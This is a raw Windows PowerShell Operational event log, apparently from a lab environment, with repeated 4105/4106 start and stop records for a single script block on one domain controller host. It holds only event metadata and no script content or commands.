ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470512
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470511
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470510
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470509
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470508
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470507
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470506
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470505
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470504
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470503
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470502
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470501
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470500
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470499
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470498
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470497
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470496
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470495
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470494
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470493
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470492
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470491
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470490
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470489
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470488
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470487
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470486
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470485
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470484
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470483
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470482
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470481
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470480
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470479
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470478
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470477
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470476
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470475
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470474
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470473
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470472
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470471
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470470
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470469
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470468
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470467
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470466
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470465
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470464
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470463
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470462
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470461
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470460
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470459
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470458
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
